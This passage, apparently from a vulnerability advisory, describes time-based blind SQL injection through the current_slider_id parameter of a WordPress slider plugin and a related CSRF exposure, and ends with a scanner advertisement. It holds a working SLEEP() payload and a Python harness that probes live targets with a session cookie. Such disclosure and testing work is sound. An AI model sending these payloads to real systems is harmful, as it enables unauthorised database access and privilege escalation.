The easiest way to reproduce the vulnerabilities is to modify the POST request sent when a slider is renamed or reordered and append part of an SQL query to the current_slider_id parameter, so that the value becomes something like "current_slider_id=1 AND SLEEP(5)"; a response that arrives roughly five seconds later than normal confirms that the injected expression reached the database. Users who do not have full administrative privileges could abuse the database access these vulnerabilities provide either to escalate their privileges or to read and modify database contents they were not meant to be able to access.
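
As an added example (not part of the original advisory), the following Python harness builds the baseline and SLEEP() request bodies described above and decides from response timing whether the injected expression reached the database. The admin-ajax URL, the `action` value and the session cookie are assumptions, since the advisory does not name the endpoint; the fake transport at the bottom lets the detector run offline against a constructed "vulnerable" and "patched" model.

```python
"""Time-based blind SQL injection check for the current_slider_id parameter.

Added example, not code from the advisory or the affected plugin. The target
URL, the `action` value and the cookie are hypothetical; swap in the real ones
when testing a system you are authorised to test.
"""
import time
import urllib.parse
import urllib.request
from typing import Callable, Optional

# Assumed (hypothetical) admin-ajax endpoint and action for the rename/reorder handler.
TARGET_URL = "http://wordpress.example/wp-admin/admin-ajax.php"
ACTION = "rename_slider"


def sleep_payload(base_id: int, seconds: int) -> str:
    """The advisory's reproduction value, e.g. '1 AND SLEEP(5)'."""
    return f"{base_id} AND SLEEP({seconds})"


def build_body(slider_id: str, extra: Optional[dict] = None) -> str:
    """Form-encode the POST body; slider_id is passed through unchanged."""
    fields = {"action": ACTION, "current_slider_id": slider_id, "title": "probe"}
    if extra:
        fields.update(extra)
    return urllib.parse.urlencode(fields)


def http_send(body: str, cookie: str) -> float:
    """Real transport: POST the body as the logged-in user, return elapsed seconds."""
    req = urllib.request.Request(
        TARGET_URL,
        data=body.encode(),
        method="POST",
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": cookie,  # assumed: a wordpress_logged_in_* session cookie
        },
    )
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=30) as resp:
        resp.read()
    return time.monotonic() - start


def is_time_injectable(send: Callable[[str], float], base_id: int = 1,
                       seconds: int = 5, trials: int = 2) -> bool:
    """Compare baseline latency with SLEEP() latency over several trials.

    Every trial must show the payload request taking close to `seconds`
    longer than the baseline; a single slow response by chance is not enough.
    """
    for _ in range(trials):
        baseline = send(build_body(str(base_id)))
        delayed = send(build_body(sleep_payload(base_id, seconds)))
        if delayed - baseline < seconds * 0.9:
            return False
    return True


def fake_send_factory(vulnerable: bool) -> Callable[[str], float]:
    """Constructed offline stand-in for http_send.

    Models a server that takes 0.2 s per request and, when `vulnerable`,
    evaluates SLEEP(n) from the raw current_slider_id value exactly as an
    unparameterised query would.
    """
    def send(body: str) -> float:
        fields = dict(urllib.parse.parse_qsl(body))
        value = fields["current_slider_id"].upper()
        elapsed = 0.2
        if vulnerable and "SLEEP(" in value:
            elapsed += int(value.split("SLEEP(")[1].split(")")[0])
        return elapsed
    return send


if __name__ == "__main__":
    print("vulnerable model:", is_time_injectable(fake_send_factory(True)))
    print("patched model:", is_time_injectable(fake_send_factory(False)))
    # Live target (authorised testing only):
    # is_time_injectable(lambda b: http_send(b, "wordpress_logged_in_<hash>=<value>"))
```

The detector requires the delay on every trial rather than once, because a single slow response on a shared host is common; against a live target, raise `trials` or `seconds` if the baseline latency is noisy.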

Because no nonce token is checked, the vulnerable code is also directly exposed to attack vectors such as Cross-Site Request Forgery (CSRF): an attacker can have a logged-in user's browser submit the rename or reorder request, injected parameter included, without that user's knowledge.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, black-box testing) solution for comprehensive security audits of running web applications. WebScanner tests a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would.